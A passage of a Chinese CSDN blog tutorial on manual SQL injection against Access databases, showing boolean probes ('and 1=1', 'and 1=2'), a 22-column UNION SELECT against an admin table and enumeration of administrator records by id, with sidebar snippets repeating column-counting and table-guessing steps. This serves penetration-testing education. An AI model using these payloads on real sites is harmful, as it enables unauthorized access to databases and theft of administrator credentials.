access拓展注入

最新推荐文章于 2024-08-31 08:15:44 发布
最新推荐文章于 2024-08-31 08:15:44 发布
阅读量264 收藏
点赞数 1
分类专栏: web安全 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weiliang369/article/details/123025291
版权
本文详细探讨了SQL注入攻击在Access数据库中的应用,通过实例展示了如何利用注入漏洞获取信息。从正常URL访问到利用`and`、`or`、`xor`逻辑操作符进行探测,再到解决显位爆破的方法,如附加`and 1=2`或前缀`-`。同时介绍了快速手动检测注入点的技巧,如`order by`和字段数的折半法,以及字段名猜测的多种策略。
摘要由CSDN通过智能技术生成

注入中发生了什么

脚本内sql语句

sql="select * from product where id=&id"

访问1137这个界面

select * from product where id=1137

访问1137 and 1=1 这是相等的访问

select * from product where id=1137 and 1=1 正常

select * from product where id=1137 and 1=2 报错

select * from product where id=1137 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

一个正常的url访问

通过脚本进行数据库交互进行访问

注入指定管理员

可以注入出指定的管理员 避免某些管理员是普通权限

我们可以进行 where id=xx索引 但是我们并不知道id等于多少

我们在这里进行id查询

获得了id是多少之后我们进行where id=39 进行查询

我们进行拓展查询 尝试id=40 id=41

我们也可以查询一些其他内容

注:where 可以指定任何表内存在的字段名 只要相应的值正

了解本专栏 订阅专栏 解锁全文 超级会员免费看
信安微凉
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Access数据库偏移注入
bylfsj的博客
09-25 926
前言       本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额。。。还是算了吧,没有太多的时间,之后在网上搜索了一些“偏移注入”看看其他人是否有写这个方面的资料,但是非常少,不过还是找到了几个,下...
渗透测试---手把手教你SQL注入(7)---Access数据库注入
weixin_52796034的博客
10-16 619
在讨论SQL注入中的Access数据库注入时,首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统,可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境,但它也可以用于大型企业和互联网应用。 此外,Access与其他数据库管理系统(如MySQLSQL Server等)在处理SQL注入方面有所不同。
access手工注入
weixin_30537391的博客
06-10 41
and 1=1 返回正常 也可以用 xor 5>6and 1=2 返回错误 也可以用 xor 5>4 【判断字段数】order by 1 返回正常、order by 1000 返回错误 然后逐步减少,直到最后一个返回正常的数字就是字段数 【猜解表名】 id=4 union select 1,2,3,4,5 from admin这里的admin是表名,不行就继续猜 【猜解...
SQL注入实战(防注入)-Access
qq_36896220的博客
09-15 366
这道题目算是给了SQL注入另外的思路了。一般而言我们测试SQL注入会选择那些有直接显示的地方(比如id=1,name=xxx),但这会局限你的思维,所以一定要多多培养做题的思路才能应对各种情况。下面会给出不一样的思路: 1.这是墨者学院一道有waf的sql注入,有很多人遇到有waf的环境就感觉头大,确实绕waf很头疼,但waf也有强弱之分,我们要做的就是测试一下对方服务器的waf做了什么,...
小迪教程第三天——access注入片段
仲夏
10-14 557
1、Sql注入产生条件1、必须有参数传递 2、参数值带入数据库查询并执行2、access注入攻击片段-联合查询法1、判断注入 2、猜解表名 3、猜解列名 4、猜解数据猜解表名的过程如下: 1)Order by 22 22 代表查询的列名的数目有22个 http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 2c
ASP+ACCESS注入—主要靠猜实现
qq_56380212的博客
03-22 334
** ASP+ACCESS注入—主要靠猜实现 ** 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdow
SQL注入基础知识
m0_61361405的博客
03-06 1628
主要原因是程序对用户输入数据的合法性没有,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行,从而进一步获取到数据信息。
内存写入注入
weixin_44711063的博客
03-06 2553
内存写入注入 如果进程A本身就给了其他进程申请和写入空间的权限,那我只要将模块复制到指定进程A的空间里面,再修改一些表,再利用远程线程或者hook也就能让我们的模块在进程A运行,这就是内存写入注入 思路 只要我进程A允许进程B有写入操作就可以实现注入。这样实现了隐藏模块的注入 拓展:若是不允许别的进程有写入操作,但应该也会允许系统进程有写入操作,只要我将注入功能注入到系统进程里面,让系统进程对进程A进行内存写入注入就可以了。相当于内存写入注入+伪装合法软件注入 步骤 1、内存写入: 获取当前模块句柄,得
SQL注入漏洞回顾
guanjian_ci的博客
03-26 4266
第一部分:信息收集 信息收集是渗透的最重要的一步,它决定你渗透能否成功的%60. 对于SQL注入,前期需要了解对方~数据库的类型~,~网站路径~,为后续测试SQL注入提供一个正确的道路。 第二部分:SQL注入数据库分类 目前网站数据库类型主流的有mysqlAccess、Mssql、mongodb、Postgresqlsqllite、oracle等等。 1.access注入 与其他类型注入不同,属于独立存在管理类型。 (1)不存在跨库注入; (2)无文件读写操作; (3)无版本、数据库
信息安全_xxe注入应用与拓展.pptx
08-14
2. **基于SOAP的Web Service**:SOAP(Simple Object Access Protocol)是一种基于XML的通信协议,若其处理XML输入时未进行安全验证,也可能成为XXE的入口。 3. **开发框架的Content-Type智能识别**:例如SpringMVC...
ASP.NET连接Access开发数据库资料
11-21
ASP.NET是一种基于.NET Framework的服务器端编程模型,用于构建动态Web应用程序...通过学习和实践“ASP.NET连接Access开发数据库资料”,开发者可以掌握基础的数据库操作技巧,并进一步拓展到更复杂的数据库应用场景。
SQL进阶技巧:如何查询最近一笔有效订单? | 近距离有效匹配问题
石榴姐yyds
08-29 162
本文所分析的案例在实际场景中经常被用到,对于支持lag()函数 ignore nulls语法的数据库,本问题就很简单,但对于Hive等数据库不支持该语法时,略会麻烦一些,针对本题我们采用一分为二的方式,对订单有效和无效分开求解,当为有效值时候,利用ag()函数正常求解,当为无效时候,由于会存在多个连续状态一致的,为了能够获取最近有效的状态,我们采用last_value()函数ignore nulls语法来实现,最终通过coalesce()函数将两种状态合并,得到最终的结果。
漏洞披露-金慧-综合管理信息系统-SQL
无问社区的博客
08-27 520
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL统计行数的语句
曹昆的技术博客
08-27 391
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
Python知识点:如何使用SQLAlchemy进行ORM(对象关系映射)
最新发布
码农超哥的博客
08-31 420
定义数据库表的ORM模型。每个模型类都需要继承自Base,并且通常以类的属性形式定义表的列。
一步迅速了解Spring框架
ymr1843762281的博客
08-28 514
将程序中的一些公共的非业务代码分离提取出来,然后在业务代码执行的时候,给他们横切进来,使用的动态代理的机制实现,在我们的业务代码,不显示调用,但是执行业务代码,会通过代理对象,调用非业务代码。以前我们在程序中需要对象,都是自己new,例如:new StudentDao对象,Spring 是一个轻量级的,IOC 和 AOP 的一站式 Java 开发框架,是为了简化企。除了核心的IOC和AOP功能之外,还对数据访问层,web层都有封装,所以是一站式的。inversion of Control 控制反转。
SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范
2301_77160226的博客
08-27 2169
SQL 注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON 注入以及头部 XFF 注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 注入攻击方式的原理和特点。
2024最新的最全面基本sqlmap使用命令
为了低调的博客
08-27 1029
bash复制代码通过本地代理(例如Burp Suite)进行扫描。bash复制代码每次请求使用随机的User-Agent头进行扫描。bash复制代码指定id和user两个参数进行测试。bash复制代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安微凉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值